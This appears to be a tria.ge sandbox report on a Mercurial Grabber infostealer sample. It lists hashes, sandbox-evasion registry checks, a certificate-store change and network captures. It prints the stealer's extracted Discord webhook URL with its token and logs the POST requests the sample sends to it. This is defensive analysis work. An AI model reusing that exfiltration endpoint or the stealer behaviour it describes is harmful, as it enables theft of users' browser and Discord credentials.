Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
28/03/2024, 20:17 UTC
Behavioral task
behavioral1
Sample
0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
Resource
win10v2004-20240226-en
General
-
Target
0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
-
Size
41KB
-
MD5
0f243aa3dcd8c33124e3fa9d3d12c343
-
SHA1
7ae66af8676fc184ae800a5c6f46ce3943655fa1
-
SHA256
f514711a78d01f9701310ae3ef72d7dcd78518a4ef355079349c6d3ce7d1cf39
-
SHA512
eee55390d27109d434f92e3f4c719a30920f0d843ceb36eedde29744fdfbe5e4c97472901da626f9d5d4ea8a5f6405e54ddb32bc6e70f4dfbc023786addc0606
-
SSDEEP
768:0scG4ApfT6ahzpDXswIuZkeNWTj0KZKfgm3Ehkl:bcKfnhz8eNWTIF7EWl
Malware Config
Extracted
mercurialgrabber
https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS
Signatures
-
Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 18 discord.com 19 discord.com 23 discord.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip4.seeip.org 5 ip4.seeip.org 16 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe -
Checks SCSI registry key(s) 3 TTPs 1 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d60168000000010000000800000000409120d035d901030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1368000000010000000800000000409120d035d9017e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d60168000000010000000800000000409120d035d901030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 5c0000000100000004000000000800001900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1368000000010000000800000000409120d035d9017e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d040000000100000010000000410352dc0ff7501b16f0028eba6f45c520000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4428 0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe"1⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:4428
Network
-
Remote address:8.8.8.8:53Request217.106.137.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestip4.seeip.orgIN AResponseip4.seeip.orgIN A23.128.64.141
-
Remote address:8.8.8.8:53Request0.205.248.87.in-addr.arpaIN PTRResponse0.205.248.87.in-addr.arpaIN PTRhttps-87-248-205-0lgwllnwnet
-
Remote address:8.8.8.8:53Request2.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
Remote address:208.95.112.1:80RequestGET //json/ HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 302
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
Remote address:8.8.8.8:53Requestdiscord.comIN AResponsediscord.comIN A162.159.138.232discord.comIN A162.159.137.232discord.comIN A162.159.128.233discord.comIN A162.159.136.232discord.comIN A162.159.135.232
-
POSThttps://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exeRemote address:162.159.138.232:443RequestPOST /api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS HTTP/1.1
Content-Type: application/json
Host: discord.com
Content-Length: 441
Expect: 100-continue
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
set-cookie: __dcfduid=38e5f398ed4011ee8dd39ac2721eb6c2; Expires=Tue, 27-Mar-2029 20:17:38 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1711657059
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OF5XydyMv6Y504vZm%2BJKoItq37JWmCTRmiNcHlbwXqeSjstv1EWqRgvzdzlZOBN%2FokzqjCy%2FT9DitfEq5pOPPXS5NJkRKti8j4h7AlekbyKU0oVNthDo7nPOo3nI"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=38e5f398ed4011ee8dd39ac2721eb6c252286f1585bfa7cf621658610747c447b4c79b418a2a8f54faca6698b99dc7eb; Expires=Tue, 27-Mar-2029 20:17:38 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=0b90a9d0d585da427664ed71b7e2f56a60c5e8c5-1711657058; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=w8BQdbUXIs17JFGXM3TBWffDWfz_jIuRQqhHKG_P7_Q-1711657058388-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 86ba4e061f3694b1-LHR
-
POSThttps://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exeRemote address:162.159.138.232:443RequestPOST /api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS HTTP/1.1
Content-Type: application/json
Host: discord.com
Content-Length: 315
Expect: 100-continue
ResponseHTTP/1.1 404 Not Found
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
set-cookie: __dcfduid=39019a76ed4011eebf71f2b9a0a04292; Expires=Tue, 27-Mar-2029 20:17:38 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1711657060
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSWzGRVRMuJx3PGR8RjiUmtWzjqGypyx5VsaL7Rilgq%2F5K%2FnCageu0%2Fd47F4RuZ0y86zC3Ok5QOwAYBVHPTM9o%2F8ElTggr55Zdd5YHEpiVU89Xn5mfzlvUuMJbQn"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=39019a76ed4011eebf71f2b9a0a042922bfb1ed3e0a9af21abd5f7839c130de5962f0fd545f996955982115d2e37b378; Expires=Tue, 27-Mar-2029 20:17:38 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=0b90a9d0d585da427664ed71b7e2f56a60c5e8c5-1711657058; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=W21S.rKJiQCyyWtmFZTLTKaYocjeb5DZHTEOqglwdDg-1711657058564-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 86ba4e07391694b1-LHR
-
POSThttps://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exeRemote address:162.159.138.232:443RequestPOST /api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS HTTP/1.1
Content-Type: application/json
Host: discord.com
Content-Length: 745
Expect: 100-continue
ResponseHTTP/1.1 404 Not Found
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
set-cookie: __dcfduid=39682c78ed4011ee82bc1e4bfad1ce74; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1711657060
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W8vdyizVb8pqcYZ4qm8563sO%2B3lJsGPELMJ6NcPNOHTZw0HJmOhNd6kBzyyu7PFpuVzYTtSQojlGxj5verhtq9RPX7KwlB43amPNiBb677VZCteT0%2BtexkKw%2BVHw"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=39682c78ed4011ee82bc1e4bfad1ce74ffddf152476fb8aec78b887916f9cd91bcf035e713f4e180e79d4726c012ba4b; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=bec68b89d56816841f41de6decf9bec5b689d633-1711657059; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=KJHNInhHwiMTsYCiv4rF9_Qs9zTWtx13CkHhFMrAesQ-1711657059236-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 86ba4e0acd8b94b1-LHR
-
POSThttps://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exeRemote address:162.159.138.232:443RequestPOST /api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS HTTP/1.1
Content-Type: multipart/form-data; boundary=----------e1bc0d13e8c946b48657b2be3059e73d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0
Host: discord.com
Content-Length: 662
Expect: 100-continue
ResponseHTTP/1.1 404 Not Found
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
set-cookie: __dcfduid=39afcccced4011eeaaf1a6d52251bd1b; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1711657061
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=shzJZp1Bc61otyaWUGk2XzRwDLWqOoXP3tK2cWqEDz2HtPSY7pBmHmuzjBGpkAu3oVAvAGOLxaaxLYCQY7MzgXUw6z34%2Fy8cF%2FOhhYVSbiqBjno1O%2BU175v0yTpc"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=39afcccced4011eeaaf1a6d52251bd1be31d75cedd1bf31123e7eebe2673ab8d15a8043ab8a142b94f3a5bf3d5158957; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=065162e3738cb4cc3aef21e298aca63710313d67-1711657059; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=KHgQ_I7PmYT1bLaXKUBxKKKrFzxpFW6cG6Fj80GzmVk-1711657059705-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 86ba4e0e2aa194b1-LHR
-
Remote address:8.8.8.8:53Request141.64.128.23.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request1.112.95.208.in-addr.arpaIN PTRResponse1.112.95.208.in-addr.arpaIN PTRip-apicom
-
Remote address:8.8.8.8:53Request232.138.159.162.in-addr.arpaIN PTRResponse
-
POSThttps://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exeRemote address:162.159.138.232:443RequestPOST /api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: discord.com
Content-Length: 196
Expect: 100-continue
ResponseHTTP/1.1 404 Not Found
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
set-cookie: __dcfduid=398bc26eed4011ee81f2da06b9926043; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1711657060
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
